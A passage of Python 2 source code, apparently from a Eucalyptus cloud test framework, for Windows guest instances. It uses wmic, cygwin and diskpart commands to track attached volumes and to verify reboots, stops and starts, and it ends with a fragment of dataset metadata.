self.debug('get_updated_logicaldisk_info, Done')
return logicaldisks
def associate_diskdrives_to_partitions(self):
for disk in self.diskdrives:
disk.disk_partitions = []
for part in self.disk_partitions:
if part.diskindex == disk.index:
disk.disk_partitions.append(part)
def associate_partitions_to_logicaldrives(self, verbose=False):
for part in self.disk_partitions:
drive_id = None
part.logicaldisks = []
cmd = 'wmic partition where (DeviceID="Disk #' + str(part.diskindex) + \
', Partition #' + str(part.index) + '") assoc /assocclass:Win32_LogicalDiskToPartition'
output = self.sys(cmd, verbose=verbose, code=0)
for line in output:
if re.search('Win32_LogicalDisk.DeviceID',line):
try:
drive_id = str(line.split()[0].split('=')[1]).replace('"','').strip()
except Exception, e:
tb = self.tester.get_traceback()
self.debug(str(tb)+ "\nError getting logical drive info:" + str(e))
if drive_id:
for disk in self.logicaldisks:
if re.match(disk.deviceid, drive_id):
part.logicaldisks.append(disk)
disk.partition = part
break
def get_cygwin_scsi_dev_for_windows_drive(self, windisk=None, drive_id=""):
'''
param windisk: WinInstanceDiskType object. windisk.deviceid is used to look up the associated cygwin device
param drive_id: String representing the deviceid. Can be used instead of passing a WinInstanceDiskType
'''
windisk_classname = ""
update = False
retries = 2
if windisk:
drive_id = windisk.deviceid
windisk_classname = str(windisk.__class__).split('.').pop()
#If this is a disk drive allow a retry which set the force update flag, otherwise don't force and retry
if isinstance(windisk,WinInstanceDiskDrive):
update = True
if not drive_id:
raise Exception('WinInstanceDiskType or string w/ device id not provided')
self.debug('Attempting to get cygwin dev for windows drive:' + str(drive_id))
self.update_cygwin_windows_device_map()
for retry in xrange(0, retries):
for device in self.cygwin_dev_map:
if re.search("dev", device):
win_dev = str(self.cygwin_dev_map[device].split('\\').pop()).strip().upper()
formated_drive_id = str(drive_id.split('\\').pop()).strip().upper()
#self.debug('Attempt to match:"' + str(win_dev) + '" with "' + str(formated_drive_id) + '"')
if formated_drive_id == win_dev:
#self.debug('Found match')
return device
if update:
self.update_cygwin_windows_device_map(force_update=True)
else:
break
self.debug('WARNING: Could not find cygwin device for type:"' + str(windisk_classname) + '", deviceid:' + str(drive_id))
return ""
def get_parsed_wmic_command_output(self, wmic_command, verbose=False):
'''
Attempts to parse a wmic command using "/format:textvaluelist.xsl" for key value format into a list of
dicts.
:param wmic_command: string representing the remote wmic command to be run
:returns : list of dict(s) created from the parsed key value output of the command.
Note keys will be in lowercase
'''
self.debug('get_parsed_wmic_command_output, command:' + str(wmic_command))
ret_dicts = []
output = self.sys(wmic_command, verbose=verbose, code=0)
newdict = {}
for line in output:
if not re.match(r"^\w",line):
#If there is a blank line(s) then the previous object is complete
if newdict:
ret_dicts.append(newdict)
newdict = {}
else:
splitline = line.split('=')
key = str(splitline.pop(0)).lower()
if len(splitline) > 1:
value = "=".join(str(x) for x in splitline)
else:
if splitline:
value = splitline.pop()
else:
value = ''
newdict[key] = value
return ret_dicts
def get_logicaldisk_ids(self, forceupdate=False):
'''
:param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are
throttled to self.disk_update_interval
:returns list of device ids (ie: [A:,C:,D:]
'''
ret = []
self.update_disk_info(forceupdate=forceupdate)
for disk in self.logicaldisks:
ret.append(disk.deviceid)
return ret
def get_diskdrive_ids(self, drivelist=None, forceupdate=False):
'''
:param forceupdate: boolean, to force an update of logical disks detected on the guest. Otherwise updates are
throttled to self.disk_update_interval
:returns list of device ids ie: ['\\.\PHYSICALDRIVE0','\\.\PHYSICALDRIVE1,'\\.\PHYSICALDRIVE2']
'''
ret = []
if not drivelist:
self.update_disk_info(forceupdate=forceupdate)
drivelist = self.diskdrives
for disk in drivelist:
ret.append(disk.deviceid)
return ret
def get_diskdrive_by_deviceid(self, deviceid):
for disk in self.diskdrives:
if disk.deviceid == deviceid:
return disk
def found(self, command, regex):
""" Returns a Boolean of whether the result of the command contains the regex"""
result = self.sys(command)
for line in result:
found = re.search(regex,line)
if found:
return True
return False
def assertFilePresent(self,filepath):
'''
Raise exception if file not found at filepath on remote guest. dirs '\' need to be represented as '\\'
'''
self.sys('dir ' + str(filepath), code=0)
def assertCygwinFilePresent(self, filepath):
self.cygwin_cmd('ls ' + str(filepath), code=0)
def attach_volume(self, volume, dev=None, timeout=180, overwrite=False):
'''
Method used to attach a volume to an instance and track it's use by that instance
required - euvolume - the euvolume object being attached
required - tester - the eucaops/nephoria object/connection for this cloud
optional - dev - string to specify the dev path to 'request' when attaching the volume to
optional - timeout - integer- time allowed before failing
optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5
'''
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume)
return self.attach_euvolume(volume, dev=dev, timeout=timeout, overwrite=overwrite)
def attach_euvolume(self, euvolume, dev=None, timeout=180, overwrite=False):
'''
Method used to attach a volume to an instance and track it's use by that instance
required - euvolume - the euvolume object being attached
required - tester - the eucaops/nephoria object/connection for this cloud
optional - dev - string to specify the dev path to 'request' when attaching the volume to
optional - timeout - integer- time allowed before failing
optional - overwrite - flag to indicate whether to overwrite head data of a non-zero filled volume upon attach for md5
'''
if not isinstance(euvolume, EuVolume):
raise Exception("Volume needs to be of type euvolume, try attach_volume() instead?")
self.debug('Disk drive summary before attach attempt:')
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
self.debug("Attempting to attach volume:"+str(euvolume.id)+" to instance:" +str(self.id)+" to dev:"+ str(dev))
#grab a snapshot of our devices before attach for comparison purposes
diskdrive_list_before = self.get_diskdrive_ids()
use_serial = False
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
break
attached_dev = None
start= time.time()
elapsed = 0
if dev is None:
#update our block device prefix
dev = self.get_free_scsi_dev()
if (self.tester.attach_volume(self, euvolume, dev, pause=10,timeout=timeout)):
if euvolume.attach_data.device != dev:
raise Exception('Attached device:' + str(euvolume.attach_data.device) +
", does not equal requested dev:" + str(dev))
#Find device this volume is using on guest...
euvolume.guestdev = None
while (not euvolume.guestdev and elapsed < timeout):
#Since all hypervisors may not support serial number info, check for an incremental diff in the
# list of physical diskdrives on this guest.
self.debug("Checking for volume attachment on guest, elapsed time("+str(elapsed)+")")
diskdrive_list_after = self.get_diskdrive_ids(forceupdate=True)
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
self.debug("dev_list_after:"+" ".join(diskdrive_list_after))
diff =list( set(diskdrive_list_after) - set(diskdrive_list_before) )
if len(diff) > 0:
self.debug('Got Diff in drives:' + str(diff))
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
if euvolume.id == disk.ebs_volume:
attached_dev = disk.deviceid
euvolume.guestdev = attached_dev
self.debug("Volume:"+str(euvolume.id)+" guest device by serialnumber:"+str(euvolume.guestdev))
break
if not use_serial:
attached_dev = str(diff[0])
euvolume.guestdev = attached_dev.strip()
self.debug("Volume:"+str(euvolume.id)+"found guest device by diff:"+str(euvolume.guestdev))
if attached_dev:
euvolume.guestdev = attached_dev
attached_vol = self.get_volume_from_attached_list_by_id(euvolume.id)
self.attached_vols.append(euvolume)
self.debug(euvolume.id+": Requested dev:"+str(euvolume.attach_data.device)+", attached to guest device:"+str(euvolume.guestdev))
break
elapsed = int(time.time() - start)
time.sleep(2)
if not euvolume.guestdev or not attached_dev:
raise Exception('Device not found on guest after '+str(elapsed)+' seconds')
else:
self.debug('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)
raise Exception('Failed to attach volume:'+str(euvolume.id)+' to instance:'+self.id)
if (attached_dev is None):
self.debug("List after\n"+" ".join(diskdrive_list_after))
raise Exception('Volume:'+str(euvolume.id)+' attached, but not found on guest'+str(self.id)+' after '+str(elapsed)+' seconds?')
#Store the md5sum of this diskdrive in the euvolume...
disk = self.get_diskdrive_by_deviceid(attached_dev)
euvolume.md5len = 1024
euvolume.md5 = self.get_dev_md5(devpath=disk.cygwin_scsi_drive, length=euvolume.md5len)
#update the volume and instances information about the attachment...
self.update_volume_guest_info(volume=euvolume,md5=euvolume.md5, md5len=euvolume.md5len, guestdev=euvolume.guestdev)
self.debug('Success attaching volume:'+str(euvolume.id)+' to instance:'+self.id +
', cloud dev:'+str(euvolume.attach_data.device)+', attached dev:'+str(attached_dev) +
", elapsed:" + str(elapsed))
try:
self.rescan_disks(timeout=20)
except Exception, e:
self.debug('Warning. Error while trying to rescan disks after attaching volume. Error: ' + str(e))
euvolume.printself(printmethod=self.debug)
disk.print_self()
return attached_dev
def get_guest_dev_for_volume(self, volume, forceupdate=False):
use_serial = False
self.update_disk_info(forceupdate=forceupdate)
for disk in self.diskdrives:
if re.search('vol-', disk.serialnumber):
use_serial = True
break
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume=volume, tester=self.tester)
def get_disk_drive_by_id(self, deviceid):
self.update_system_info()
for disk in self.diskdrives:
if disk.deviceid == deviceid:
return disk
return None
def get_guestdevs_inuse_by_vols(self):
retlist = []
for vol in self.attached_vols:
retlist.append(vol.guestdev)
return retlist
def get_free_scsi_dev(self, prefix=None,maxdevs=16):
'''
The volume attach command requires a cloud level device name that is not currently associated with a volume
Note: This is the device name from the clouds perspective, not necessarily the guest's
This method attempts to find a free device name to use in the command
optional - prefix - string, pre-pended to the the device search string
optional - maxdevs - number use to specify the max device names to iterate over.Some virt envs have a limit of 16 devs.
'''
d='e'
in_use_cloud = ""
in_use_guest = ""
dev = None
if prefix is None:
prefix = self.block_device_prefix
cloudlist=self.tester.get_volumes(attached_instance=self.id)
for x in xrange(0,maxdevs):
inuse=False
#double up the letter identifier to avoid exceeding z
if d == 'z':
prefix= prefix+'e'
dev = "/dev/"+prefix+str(d)
for avol in self.attached_vols:
if avol.attach_data.device == dev:
inuse = True
in_use_guest += str(avol.id)+", "
continue
#Check to see if the cloud has a conflict with this device name...
for vol in cloudlist:
vol.update()
if (vol.attach_data is not None) and (vol.attach_data.device == dev):
inuse = True
in_use_cloud += str(vol.id)+", "
continue
if inuse is False:
self.debug("Instance:"+str(self.id)+" returning available cloud scsi dev:"+str(dev))
return str(dev)
else:
d = chr(ord('e') + x) #increment the letter we append to the device string prefix
dev = None
if dev is None:
raise Exception("Could not find a free scsi dev on instance:"+self.id+", maxdevs:"+str(maxdevs)+"\nCloud_devs:"+str(in_use_cloud)+"\nGuest_devs:"+str(in_use_guest))
def detach_euvolume(self, euvolume, waitfordev=True, timeout=180):
'''
Method used to detach detach a volume to an instance and track it's use by that instance
required - euvolume - the euvolume object being deattached
waitfordev - boolean to indicate whether or no to poll guest instance for local device to be removed
optional - timeout - integer seconds to wait before timing out waiting for the volume to detach
'''
start = time.time()
elapsed = 0
found = True
for vol in self.attached_vols:
if vol.id == euvolume.id:
dev = vol.guestdev
if (self.tester.detach_volume(euvolume,timeout=timeout)):
if waitfordev:
self.debug("Cloud has detached" + str(vol.id) + ", Wait for device:"+str(dev)+" to be removed on guest...")
while (elapsed < timeout):
diskdrive_ids = []
try:
disk_drives = self.get_updated_diskdrive_info()
for disk in disk_drives:
if dev == disk.deviceid:
found = True
break
found = False
self.debug('Diskdrive associated with ' + str(vol.id) + ' has been removed from guest.')
#if device is not present remove it
self.attached_vols.remove(vol)
except Exception, de:
self.debug('Warning, error getting diskdrive id during detach:' + str(de))
if not found:
try:
self.rescan_disks(timeout=20)
except Exception, re:
self.debug('Warning: Error while trying to rescan disks after detaching volume:' + str(re))
try:
self.update_disk_info()
except Exception, ue:
self.debug('Warning: Error while trying to update disk info:' + str(ue))
try:
self.print_diskdrive_summary()
except: pass
self.debug('Volume:' + str(vol.id) + ', detached, and no longer found on guest at:' + str(dev))
vol.set_volume_detached_tags()
return True
time.sleep(10)
elapsed = int(time.time()-start)
diskdrive_ids = self.get_diskdrive_ids(drivelist=disk_drives)
self.debug('Current disk drives on guest:' + ",".join(str(x) for x in diskdrive_ids))
self.debug("Waiting for device '"+str(dev)+"' on guest to be removed.Elapsed:"+str(elapsed))
else:
self.attached_vols.remove(vol)
vol.set_volume_detached_tags()
return True
else:
raise Exception("Volume("+str(vol.id)+") failed to detach from device("+str(dev)+") on ("+str(self.id)+")")
raise Exception("Detach Volume("+str(euvolume.id)+") not found on ("+str(self.id)+")")
return False
def check_hostname(self):
if not hasattr(self, 'system_info'):
self.update_system_info()
if hasattr(self, 'system_info') and hasattr(self.system_info, 'host_name'):
if self.id.upper() == self.system_info.host_name.upper():
self.debug('Hostname:' + str(self.id) + ", instance.id:" + str(self.system_info.host_name))
else:
raise Exception('check_hostname failed: hostname:' + str(self.system_info.host_name).upper() +
" != id:" + str(self.id).upper())
else:
raise Exception('check_hostname failed: System_info.hostname not populated')
def get_process_list_brief(self):
'''
Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = "wmic process list brief /format:textvaluelist.xsl"
return self.get_parsed_wmic_command_output(cmd)
def get_process_list_full(self):
'''
Returns a list of dicts representing the processes running on the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = "wmic process list full"
return self.get_parsed_wmic_command_output(cmd)
def get_process_by_name(self,process_name):
'''
Attempts to lookup a service on the remote guest.
param service_name: string. The name of the service to get info
returns a dict representing the information returned from the remote guest
'''
cmd = 'wmic process ' + str(process_name) + ' get /format:textvaluelist.xsl'
result = self.get_parsed_wmic_command_output(cmd)
if result:
return result[0]
def get_services_list_brief(self):
'''
Returns a list of dicts representing the services from the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = 'wmic service list brief /format:textvaluelist.xsl'
return self.get_parsed_wmic_command_output(cmd)
def get_services_list_full(self):
'''
Returns a list of dicts representing the services from the remote guest. Each service is represented by a
dict containing information about the service.
'''
cmd = 'wmic service list full'
return self.get_parsed_wmic_command_output(cmd)
def get_service_by_name(self,service_name):
'''
Attempts to lookup a service on the remote guest.
param service_name: string. The name of the service to get info
returns a dict representing the information returned from the remote guest
'''
cmd = 'wmic service ' + str(service_name) + ' get /format:textvaluelist.xsl'
result = self.get_parsed_wmic_command_output(cmd)
if result:
return result[0]
def get_memtotal_in_mb(self):
return long(self.system_info.total_physical_memory.split()[0].replace(',',''))
def get_memtotal_in_gb(self):
return long(self.get_memtotal_in_mb()/1024)
def check_ram_against_vmtype(self, pad=32):
total_ram = self.get_memtotal_in_mb()
self.debug('Ram check: vm_ram:' + str(self.vmtype_info.ram)
+ "mb vs memtotal:" + str(total_ram)
+ "mb. Diff:" + str(self.vmtype_info.ram - total_ram)
+ "mb, pad:" + str(pad) + "mb")
if not ((self.vmtype_info.ram - total_ram) <= pad):
raise Exception('Ram check failed. vm_ram:' + str(self.vmtype_info.ram)
+ " vs memtotal:" + str(total_ram) + ". Diff is greater than allowed pad:" + str(pad) + "mb")
else:
self.debug('check_ram_against_vmtype, passed')
def check_ephemeral_against_vmtype(self):
gb = self.gigabyte
size = self.vmtype_info.disk
ephemeral_dev = self.get_ephemeral_dev()
block_size = self.get_blockdev_size_in_bytes(ephemeral_dev)
gbs = block_size / gb
self.debug('Ephemeral check: ephem_dev:'
+ str(ephemeral_dev)
+ ", bytes:"
+ str(block_size)
+ ", gbs:"
+ str(gbs)
+ ", vmtype size:"
+ str(size))
if gbs != size:
raise Exception('Ephemeral check failed. ' + str(ephemeral_dev) + ' Blocksize: '
+ str(gbs) + "gb (" + str(block_size) + "bytes)"
+ ' != vmtype size:' +str(size) + "gb")
else:
self.debug('check_ephemeral_against_vmtype, passed')
return ephemeral_dev
def get_ephemeral_dev(self):
"""
Attempts to find the block device path on this instance
:return: string representing path to ephemeral block device
"""
ephem_name = None
dev_prefixs = ['s','v','xd','xvd']
if not self.root_device_type == 'ebs':
try:
self.assertFilePresent('/dev/' + str(self.rootfs_device))
return self.rootfs_device
except:
ephem_name = 'da'
else:
ephem_name = 'db'
devs = self.get_dev_dir()
for prefix in dev_prefixs:
if str(prefix+ephem_name) in devs:
return str('/dev/'+prefix+ephem_name)
raise Exception('Could not find ephemeral device?')
def cygwin_cmd(self, cmd, timeout=120, verbose=False, code=None):
cmd = self.get_cygwin_path() + '\\bin\\bash.exe --login -c "' + str(cmd) + '"'
return self.sys(cmd,timeout=timeout, verbose=verbose, code=code)
def get_dev_md5(self, devpath, length, timeout=60):
self.assertCygwinFilePresent(devpath)
if length == 0:
md5 = str(self.cygwin_cmd('md5sum ' + devpath, timeout=timeout)[0]).split(' ')[0].strip()
else:
md5 = str(self.cygwin_cmd("head -c " + str(length) + " " + str(devpath) + " | md5sum")[0]).split(' ')[0].strip()
return md5
def update_cygwin_windows_device_map(self, prefix='/dev/*', force_update=False):
cygwin_dev_map = {}
if not force_update:
if self.cygwin_dev_map:
if time.time() - self.cygwin_dev_map['last_updated'] <= 30:
cygwin_dev_map = self.cygwin_dev_map
if not cygwin_dev_map:
self.debug('Updating cygwin to windows device mapping...')
output = self.cygwin_cmd("for DEV in " + prefix + " ; do printf $DEV=$(cygpath -w $DEV); echo ''; done",
verbose=False, code=0)
for line in output:
if re.match(prefix, line):
split = line.split('=')
key = split.pop(0)
if split:
value = split.pop()
else:
value = ''
cygwin_dev_map[key]=value
cygwin_dev_map['last_updated'] = time.time()
self.cygwin_dev_map = cygwin_dev_map
self.debug('Updated cygwin to windows device mapping')
return cygwin_dev_map
def rescan_disks(self, timeout=20):
'''
Attempts to rescan disks on the guest. This may help expedite updates/discovery when attaching/detaching
volumes to the guest. This has also been found to hang post device removal so is used with a 20 second
command timeout as the default.
param timeout: integer. Seconds to wait on command before failing
'''
scriptname = 'eutester_diskpart_script'
self.sys('(echo rescan && echo list disk ) > ' + str(scriptname), code=0)
self.sys('diskpart /s ' + str(scriptname), code=0, timeout=timeout)
def get_diskdrive_for_volume(self, volume):
if not self.is_volume_attached_to_this_instance(volume):
return None
ret_disk = None
for disk in self.diskdrives:
disk.update_ebs_info()
if disk.ebs_volume == volume.id:
ret_disk = disk
if not ret_disk:
ret_disk = self.find_diskdrive_for_volume_by_serial_number(volume, force_check=True)
if not ret_disk:
if hasattr(volume,'md5') and volume.md5:
ret_disk = self.find_diskdrive_for_volume_by_md5(volume, force_check=True)
return ret_disk
def find_diskdrive_for_volume_by_md5(self, volume, md5=None, length=None, force_check=False):
if not force_check and not self.is_volume_attached_to_this_instance(volume):
return None
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume=volume,tester=self.tester)
md5 = md5 or volume.md5
if not md5:
return None
length = length or volume.md5len
for disk in self.diskdrives:
if disk.cygwin_scsi_drive:
disk_md5 = self.get_dev_md5(disk.cygwin_scsi_drive, length=length)
if disk_md5 == md5:
volume.guestdev = disk.deviceid
volume.md5 = disk_md5
volume.md5len = length
disk.ebs_volume = volume.id
return disk
return None
def find_diskdrive_for_volume_by_serial_number(self, volume, serial_number=None, force_check=False):
'''
Attempt to iterate through all the diskdrives were aware of. If a diskdrive is found with a serial_number
associated with the volume, return that diskdrive obj..
example serial number format: vol-81C13EA4-dev-sdg
:param volume: volume obj to use for deriving the serial_number
:param serial_number: string. Optional. The string representing the serial # to match.
:returns WinInstanceDiskDrive if found, else None
'''
if not force_check and not self.is_volume_attached_to_this_instance(volume):
return None
if not serial_number:
serial_number = volume.id + volume.attach_data.device.replace('/','-')
for disk in self.diskdrives:
if disk.serialnumber == serial_number:
return disk
return None
def is_volume_attached_to_this_instance(self, volume):
'''
Attempts to look up volume state per cloud to confirm the cloud believe the state of this volume is attached
to this instance. This does not verify the guest/hypervisor also belives the volume is attached.
:param volume: volume obj.
:returns boolean
'''
volume.update()
if hasattr(volume, 'attach_data') and volume.attach_data and (volume.attach_data.instance_id == self.id):
self.debug('Volume:' + str(volume.id) + " is attached to this instance: " + str(self.id) + " per cloud perspective")
return True
else:
self.debug('Volume:' + str(volume.id) + " is NOT attached to this instance: " + str(self.id) + " per cloud perspective")
return False
def update_volume_guest_info(self, volume, md5=None, md5len=None, guestdev=None):
self.debug("{0} update_volume_guest_info: {1} {2}"
.format(termline, volume, termline))
if not self.is_volume_attached_to_this_instance(volume):
raise Exception('Volume not attached to this instance')
disk = None
if not self.get_volume_from_attached_list_by_id(volume.id):
self.attached_vols.append(volume)
volume.guestdev = guestdev or volume.guestdev
if md5:
if not md5len:
raise Exception('Must provide md5len if providing the md5')
volume.md5 = md5
volume.md5len = md5len
else:
disk = self.get_diskdrive_for_volume(volume)
if not disk:
raise Exception('Could not find diskdrive for volume when attempting to update volume guest info:' + str(volume))
volume.md5len = md5len or 1024
volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)
if not guestdev:
volume.guestdev = disk.deviceid
disk = disk or self.get_diskdrive_for_volume(volume)
disk.update_ebs_info()
volume.update_volume_attach_info_tags(md5=volume.md5, md5len=volume.md5len, instance_id=self.id, guestdev=volume.guestdev)
return volume
def get_unsynced_volumes(self, check_md5=True):
'''
Description: Returns list of volumes which are:
-in a state the cloud believes the vol is no longer attached
-the attached device has changed, or is not found.
If all euvols are shown as attached to this instance, and the last known local dev is present and/or a local device is found with matching md5 checksum
then the list will return 'None' as all volumes are successfully attached and state is in sync.
By default this method will iterate through all the known euvolumes attached to this euinstance.
A subset can be provided in the list argument 'euvol_list'.
Returns a list of euvolumes for which a corresponding guest device could not be found, or the cloud no longer believes is attached.
:param euvol_list: - optional - euvolume object list. Defaults to all self.attached_vols
:param md5length: - optional - defaults to the length given in each euvolume. Used to calc md5 checksum of devices
:param timerpervolume: -optional - time to wait for device to appear, per volume before failing
:param min_polls: - optional - minimum iterations to check guest devs before failing, despite timeout
:param check_md5: - optional - find devices by md5 comparision. Default is to only perform this check when virtio_blk is in use.
'''
bad_list = []
retdict = self.sync_attached_volumes_with_clouds_view()
bad_list.extend(retdict['badvols'])
return bad_list
def reboot_instance_and_verify(self,
waitconnect=60,
timeout=600,
wait_for_ports=180,
connect=True,
checkvolstatus=False,
pad=5,
uptime_retries=3):
'''
Attempts to reboot an instance and verify it's state post reboot.
waitconnect-optional-integer representing seconds to wait before attempting to connect to instance after reboot
timeout-optional-integer, seconds. If a connection has failed, this timer is used to determine a retry
connect- optional - boolean to indicate whether an ssh session should be established once the expected state has been reached
checkvolstatus - optional -boolean to be used to check volume status post start up
'''
msg=""
newuptime = None
attempt = 0
def get_safe_uptime():
uptime = None
try:
uptime = self.get_uptime()
except: pass
return uptime
self.debug('Attempting to reboot instance:'+str(self.id)+', check attached volume state first')
uptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)
elapsed = 0
start = time.time()
if checkvolstatus:
#update the md5sums per volume before reboot
bad_vols=self.get_unsynced_volumes()
if bad_vols != []:
for bv in bad_vols:
self.debug(str(self.id)+'Unsynced volume found:'+str(bv.id))
raise Exception(str(self.id)+"Could not reboot using checkvolstatus flag due to unsync'd volumes")
self.debug('Rebooting now...')
self.reboot()
time.sleep(waitconnect)
try:
self.poll_for_ports_status(ports=[3389,5589], timeout=wait_for_ports)
except:
self.debug('Failed to poll winrm and rdp ports after ' + str(wait_for_ports) + ' seconds, try to connect anyways...')
timeout=timeout - int(time.time()-start)
while (elapsed < timeout):
self.connect_to_instance(timeout=timeout)
#Wait for the system to provide a valid response for uptime, early connections may not
newuptime = self.tester.wait_for_result( get_safe_uptime, None, oper=operator.ne)
elapsed = int(time.time()-start)
#Check to see if new uptime is at least 'pad' less than before, allowing for some pad
if (newuptime - (uptime+elapsed)) > pad:
err_msg = "Instance uptime does not represent a reboot. Orig:"+str(uptime)+\
", New:"+str(newuptime)+", elapsed:"+str(elapsed)+"/"+str(timeout)
if elapsed > timeout:
raise Exception(err_msg)
else:
self.debug(err_msg)
else:
self.debug("Instance uptime indicates a reboot. Orig:"+str(uptime)+\
", New:"+str(newuptime)+", elapsed:"+str(elapsed))
break
if checkvolstatus:
badvols= self.get_unsynced_volumes()
if badvols != []:
for vol in badvols:
msg = msg+"\nVolume:"+vol.id+" Local Dev:"+vol.guestdev
raise Exception("Missing volumes post reboot:"+str(msg)+"\n")
self.debug(self.id+" reboot_instance_and_verify Success")
def get_uptime(self):
if not hasattr(self, 'system_info'):
self.update_system_info()
if hasattr(self.system_info, 'system_boot_time'):
return self._get_uptime_from_system_boot_time()
elif hasattr(self.system_info, 'system_up_time'):
return self._get_uptime_from_system_up_time()
else:
tb = self.tester.get_traceback()
raise Exception(str(tb) + '\nCould not get system boot or up time from system_info')
def _get_uptime_from_system_boot_time(self):
#11/18/2013, 3:15:39 PM
if not hasattr(self, 'system_info'):
self.update_system_info()
splitdate = self.system_info.system_boot_time.split()
datestring = splitdate[0]
timestring = splitdate[1]
ampm = splitdate[2]
month, day, year = datestring.replace(',',"").split('/')
hours, minutes, seconds = timestring.split(':')
if ampm == 'PM':
hours = int(hours) + 12
datetimestring = str(year) + " " + \
str(month) + " " + \
str(day) + " " + \
str(hours) + " " + \
str(minutes) + " " + \
str(seconds)
dt = datetime.strptime(datetimestring, "%Y %m %d %H %M %S")
return int(time.time() - time.mktime(dt.timetuple()))
def _get_uptime_from_system_up_time(self):
#0 Days, 0 Hours, 6 Minutes, 39 Seconds
if not hasattr(self, 'system_info'):
self.update_system_info()
uptime_string = self.system_info.system_up_time
days = 0
hours = 0
minutes = 0
seconds = 0
split = uptime_string.split(',')
for part in split:
time_string = ""
if re.search('Days', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
days = int(time_string or 0)
elif re.search('Hours', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
hours = int(time_string or 0)
elif re.search('Minutes', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
minutes = int(time_string or 0)
elif re.search('Seconds', part, re.IGNORECASE):
time_string = str(part.split()[0]).strip()
seconds = int(time_string or 0)
self.debug("Days:" +str(days)+', Hours:'+ str(hours) + ", Minutes:" + str(minutes) + ", Seconds:" + str(seconds))
uptime = (days * 86400) + (hours * 3600) + (minutes * 60) + seconds
return uptime
def stop_instance_and_verify(self, timeout=200, state='stopped',
failstate='terminated', check_vols=True):
'''
Attempts to stop instance and verify the state has gone to
stopped state
:param timeout; -optional-time to wait on instance to go to state 'state' before failing
:param state: -optional-the expected state to signify success, default is stopped
:param failstate: -optional-a state transition that indicates failure, default is terminated
'''
self.debug(self.id+" Attempting to stop instance...")
start = time.time()
elapsed = 0
self.stop()
while (elapsed < timeout):
time.sleep(2)
self.update()
if self.state == state:
break
if self.state == failstate:
raise Exception(str(self.id) + " instance went to state:" +
str(self.state) + " while stopping")
elapsed = int(time.time()- start)
if elapsed % 10 == 0 :
self.debug(str(self.id) + " wait for stop, in state:" +
str(self.state) + ",time remaining:" +
str(elapsed) + "/" + str(timeout) )
if self.state != state:
raise Exception(self.id + " state: " + str(self.state) +
" expected:" + str(state) +
", after elapsed:" + str(elapsed))
if check_vols:
for volume in self.attached_vols:
volume.update
if volume.status != 'in-use':
raise Exception(str(self.id) + ', Volume ' +
str(volume.id) + ':' + str(volume.status)
+ ' state did not remain in-use '
'during stop')
self.debug(self.id + " stop_instance_and_verify Success")
def start_instance_and_verify(self, timeout=300, state = 'running',
failstates=['terminated'], failfasttime=30,
connect=True, checkvolstatus=True):
'''
Attempts to start instance and verify state, and reconnects ssh session
:param timeout: -optional-time to wait on instance to go to state
'state' before failing
:param state: -optional-the expected state to signify success,
default is running
:param failstate: -optional-a state transition that indicates failure,
default is terminated
:param connect: -optional - boolean to indicate whether an ssh
session should be established once the expected state
has been reached
:param checkvolstatus: -optional -boolean to be used to check volume
status post start up
'''
self.debug(self.id+" Attempting to start instance...")
if checkvolstatus:
for volume in self.attached_vols:
volume.update
if checkvolstatus:
if volume.status != 'in-use':
raise Exception(str(self.id) + ', Volume ' + str(volume.id) + ':' + str(volume.status)
+ ' state did not remain in-use during stop' )
self.debug("\n"+ str(self.id) + ": Printing Instance 'attached_vol' list:\n")
self.tester.show_volumes(self.attached_vols)
msg=""
start = time.time()
elapsed = 0
self.update()
#Add fail fast states...
if self.state == 'stopped':
failstates.extend(['stopped','stopping'])
self.start()
while (elapsed < timeout):
elapsed = int(time.time()- start)
self.update()
self.debug(str(self.id) + " wait for start, in state:" +
str(self.state) + ",time remaining:" + str(elapsed) +
"/"+str(timeout) )
if self.state == state:
break
if elapsed >= failfasttime:
for failstate in failstates:
if self.state == failstate:
raise Exception(str(self.id) +
" instance went to state:" +
str(self.state) + " while starting")
time.sleep(10)
if self.state != state:
raise Exception(self.id + " not in " + str(state) +
" state after elapsed:" + str(elapsed))
else:
self.debug(self.id + " went to state:" + str(state))
if connect:
self.connect_to_instance(timeout=timeout)
if checkvolstatus:
badvols= self.get_unsynced_volumes(check_md5=True)
if badvols != []:
for vol in badvols:
msg = msg + "\nVolume:" + vol.id + " Local Dev:" +\
vol.guestdev
raise Exception("Missing volumes post reboot:" + str(msg) +
"\n")
self.debug(self.id+" start_instance_and_verify Success")
|
normal
|
{
"blob_id": "920cd41b18f5cfb45f46c44ed707cebe682d4dd9",
"index": 820,
